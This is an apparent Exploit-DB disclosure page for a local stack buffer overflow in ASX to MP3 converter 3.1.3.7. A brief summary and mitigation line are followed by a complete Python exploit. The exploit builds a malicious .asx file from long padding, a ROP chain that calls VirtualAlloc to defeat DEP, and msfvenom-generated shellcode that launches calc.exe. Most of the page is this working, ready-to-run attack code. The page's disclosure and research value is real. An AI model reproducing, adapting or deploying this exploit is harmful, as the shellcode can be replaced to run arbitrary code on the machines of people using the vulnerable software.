ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)

vendor:

ASX to MP3 converter

by:

max7253

7.5

CVSS

HIGH

Local Stack Overflow

CWE

Product Name: ASX to MP3 converter

Affected Version From: 3.1.3.7

Affected Version To: 3.1.3.7

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC

2019

ASX to MP3 converter 3.1.3.7 – ‘.asx’ Local Stack Overflow (DEP)

This exploit takes advantage of a local stack overflow vulnerability in ASX to MP3 converter version 3.1.3.7. By exploiting this vulnerability, an attacker can execute arbitrary code with the privileges of the user running the vulnerable software.

Mitigation:

Update to a non-vulnerable version of the software or apply any patches or security updates provided by the vendor.

Source

Exploit-DB raw data:

# Exploit Title: ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)
# Google Dork: N/A
# Date: 2019-10-06
# Exploit Author: max7253
# Vendor Homepage: http://www.mini-stream.net/
# Software Link: https://www.exploit-db.com/apps/f4da5b43ca4b035aae55dfa68daa67c9-ASXtoMP3Converter.exe
# Version: 3.1.3.7.2010.11.05
# Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC
# CVE : N/A

# Note: There is a similar exploit published but it doesn't work in the OS I used:
# https://www.exploit-db.com/exploits/42963
# This exploit in the ROP chain uses addresses from ASLR modules. Not sure what OS that exploit was tested on.


import struct
file = 'fuzz_rop.asx'
#Tested on
#OS Name:                   Microsoft Windows 7 Enterprise
#OS Version:                6.1.7601 Service Pack 1 Build 7601
#System Type:               x64-based PC

#msfvenom -p windows/exec cmd=calc.exe -a x86 -b '\x00\x09\x0a' -f python
buf =  b""
buf += b"\xda\xd7\xbf\xf1\xca\xd1\x3f\xd9\x74\x24\xf4\x5a\x29"
buf += b"\xc9\xb1\x31\x83\xc2\x04\x31\x7a\x14\x03\x7a\xe5\x28"
buf += b"\x24\xc3\xed\x2f\xc7\x3c\xed\x4f\x41\xd9\xdc\x4f\x35"
buf += b"\xa9\x4e\x60\x3d\xff\x62\x0b\x13\x14\xf1\x79\xbc\x1b"
buf += b"\xb2\x34\x9a\x12\x43\x64\xde\x35\xc7\x77\x33\x96\xf6"
buf += b"\xb7\x46\xd7\x3f\xa5\xab\x85\xe8\xa1\x1e\x3a\x9d\xfc"
buf += b"\xa2\xb1\xed\x11\xa3\x26\xa5\x10\x82\xf8\xbe\x4a\x04"
buf += b"\xfa\x13\xe7\x0d\xe4\x70\xc2\xc4\x9f\x42\xb8\xd6\x49"
buf += b"\x9b\x41\x74\xb4\x14\xb0\x84\xf0\x92\x2b\xf3\x08\xe1"
buf += b"\xd6\x04\xcf\x98\x0c\x80\xd4\x3a\xc6\x32\x31\xbb\x0b"
buf += b"\xa4\xb2\xb7\xe0\xa2\x9d\xdb\xf7\x67\x96\xe7\x7c\x86"
buf += b"\x79\x6e\xc6\xad\x5d\x2b\x9c\xcc\xc4\x91\x73\xf0\x17"
buf += b"\x7a\x2b\x54\x53\x96\x38\xe5\x3e\xfc\xbf\x7b\x45\xb2"
buf += b"\xc0\x83\x46\xe2\xa8\xb2\xcd\x6d\xae\x4a\x04\xca\x40"
buf += b"\x01\x05\x7a\xc9\xcc\xdf\x3f\x94\xee\x35\x03\xa1\x6c"
buf += b"\xbc\xfb\x56\x6c\xb5\xfe\x13\x2a\x25\x72\x0b\xdf\x49"
buf += b"\x21\x2c\xca\x29\xa4\xbe\x96\x83\x43\x47\x3c\xdc"

payload = "http://"
payload += "A" * 17417 + struct.pack('<L', 0x1002D038) + "CCCC"

## Save allocation type (0x1000) in EDX
payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN
payload += struct.pack('<L', 0x11111111)
payload += struct.pack('<L', 0x10029B8C) # XOR EDX,EDX # RETN
payload += struct.pack('<L', 0x1002D493) # POP EDX # RETN
payload += struct.pack('<L', 0xEEEEFEEF)
payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN
payload += struct.pack('<L', 0x41414141)

## Save the address of VirtualAlloc() in ESI
payload += struct.pack('<L', 0x1002fade) # POP EAX # RETN [MSA2Mfilter03.dll] 
payload += struct.pack('<L', 0x1004f060) # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll]
payload += struct.pack('<L', 0x1003239f) # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSA2Mfilter03.dll]
payload += struct.pack('<L', 0x10040754) # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN
payload += struct.pack('<L', 0x41414141)
payload += struct.pack('<L', 0x41414141)

## Save the size of the block in EBX
payload += struct.pack('<L', 0x1004d881) # XOR EAX,EAX # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
payload += struct.pack('<L', 0x10034735) # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN

## Save the address of (# ADD ESP,8 # RETN) in EBP
payload += struct.pack('<L', 0x10031c6c) # POP EBP # RETN
payload += struct.pack('<L', 0x10012316) # ADD ESP,8 # RETN
#payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN

## Save memory protection code (0x40) in ECX
payload += struct.pack('<L', 0x1002ca22) # POP ECX # RETN
payload += struct.pack('<L', 0xFFFFFFFF)
payload += struct.pack('<L', 0x10031ebe) # INC ECX # AND EAX,8 # RETN
payload += struct.pack('<L', 0x10031ebe) # INC ECX # AND EAX,8 # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN
payload += struct.pack('<L', 0x1002a5b7) # ADD ECX,ECX # RETN

## Save ROP-NOP in EDI
payload += struct.pack('<L', 0x1002e346) # POP EDI # RETN
payload += struct.pack('<L', 0x1002D038) # RETN

## Save NOPs in EAX
#payload += struct.pack('<L', 0x1003bca4) # POP EAX # RETN [MSA2Mfilter03.dll] 
#payload += struct.pack('<L', 0x90909090) # nop

## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address
payload += struct.pack('<L', 0x1002E516) # POP EAX # RETN
payload += struct.pack('<L', 0xA4E2F275)
payload += struct.pack('<L', 0x1003efe2) # ADD EAX,5B5D5E5F # RETN
payload += struct.pack('<L', 0x10040ce5) # PUSH EAX # RETN

payload += "\x90" * 4
payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN
payload += "\x90" * 20
payload += buf

f = open(file,'w')
f.write(payload)
f.close()